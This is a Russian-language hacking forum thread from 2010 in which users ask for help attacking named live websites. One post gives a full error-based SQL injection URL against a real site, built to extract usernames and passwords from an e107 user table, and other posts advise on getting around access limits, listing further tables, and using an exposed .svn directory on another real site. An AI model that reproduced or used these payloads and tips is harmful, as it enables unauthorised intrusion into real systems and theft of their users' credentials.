ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11421  
Старый 31.01.2010, 19:39
aldonin
Новичок
Регистрация: 11.01.2009
Сообщений: 5
Провел на форуме:
19041

Репутация: 0
По умолчанию

Это я уже смотрел.А как они видели файловую структуру,такого не отображается почему-то?Пробывал через клиент но просит естественно пароль.Может там хеш валяется как нить полезный?=)
 
Ответить с цитированием

  #11422  
Старый 31.01.2010, 19:43
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465

Репутация: 0
По умолчанию

Делаю зарос

http://www.ollis.ru/index.php?rest=1')%20union%20select%20*%20FROM%20( SELECT%20*%20FROM%20(SELECT%20NAME_CONST((SELECT%2 0concat_ws(0x3a,user_loginname,user_password)%20FR OM%20e107.e107_user%20LIMIT%201),%2014)d)%20as%20t %20%20JOIN%20(SELECT%20NAME_CONST((SELECT%20concat _ws(0x3a,user_loginname,user_password)%20FROM%20e1 07.e107_user%20LIMIT%201),%2014)e)%20b)a%23

выводит только логин , как найти пароль?
 
Ответить с цитированием

  #11423  
Старый 31.01.2010, 19:46
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от MastaBass1  
Делаю зарос

http://www.ollis.ru/index.php?rest=1')%20union%20select%20*%20FROM%20( SELECT%20*%20FROM%20(SELECT%20NAME_CONST((SELECT%2 0concat_ws(0x3a,user_loginname,user_password)%20FR OM%20e107.e107_user%20LIMIT%201),%2014)d)%20as%20t %20%20JOIN%20(SELECT%20NAME_CONST((SELECT%20concat _ws(0x3a,user_loginname,user_password)%20FROM%20e1 07.e107_user%20LIMIT%201),%2014)e)%20b)a%23

выводит только логин , как найти пароль?
Не выводит он логина, а пишет, что доступ к таблице e107_user текущему пользователю запрещен.
 
Ответить с цитированием

  #11424  
Старый 31.01.2010, 19:48
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465

Репутация: 0
По умолчанию

Цитата:
Сообщение от mailbrush  
Не выводит он логина, а пишет, что доступ к таблице e107_user текущему пользователю запрещен.
И как это обойти?И возможно ли?
 
Ответить с цитированием

  #11425  
Старый 31.01.2010, 19:53
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от MastaBass1  
И как это обойти?И возможно ли?
Никак. Нет.
 
Ответить с цитированием

  #11426  
Старый 31.01.2010, 19:54
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465

Репутация: 0
По умолчанию

Цитата:
Сообщение от mailbrush  
Никак. Нет.
Тоесть пользователей пароли никак.А говорил читай сатьи...все вытащишь.
 
Ответить с цитированием

  #11427  
Старый 31.01.2010, 19:58
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от MastaBass1  
Тоесть пользователей пароли никак.А говорил читай сатьи...все вытащишь.
Из таблицы e107_user - никак. Но скорее всего там есть еще таблицы. И прочитав статьи, а точнее поняв их, вытащишь все, что возможно вытащить!
 
Ответить с цитированием

  #11428  
Старый 31.01.2010, 19:59
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465

Репутация: 0
По умолчанию

Цитата:
Сообщение от mailbrush  
Из таблицы e107_user - никак. Но скорее всего там есть еще таблицы. И прочитав статьи, а точнее поняв их, вытащишь все, что возможно вытащить!
А как узнать какие еще есть таблы?Это я из статьи взял e107
 
Ответить с цитированием

  #11429  
Старый 31.01.2010, 20:02
aldonin
Новичок
Регистрация: 11.01.2009
Сообщений: 5
Провел на форуме:
19041

Репутация: 0
По умолчанию

А вот тут вроде более интересная инфа о сайте http://kp.ru/.svn/text-base/autohandler.svn-base#raw ?
 
Ответить с цитированием

  #11430  
Старый 31.01.2010, 20:07
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от MastaBass1  
А как узнать какие еще есть таблы?Это я из статьи взял e107
Читай статьи, про вывод через NAME_CONST. QWAZAR описывал этот способ, я уже говорил.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ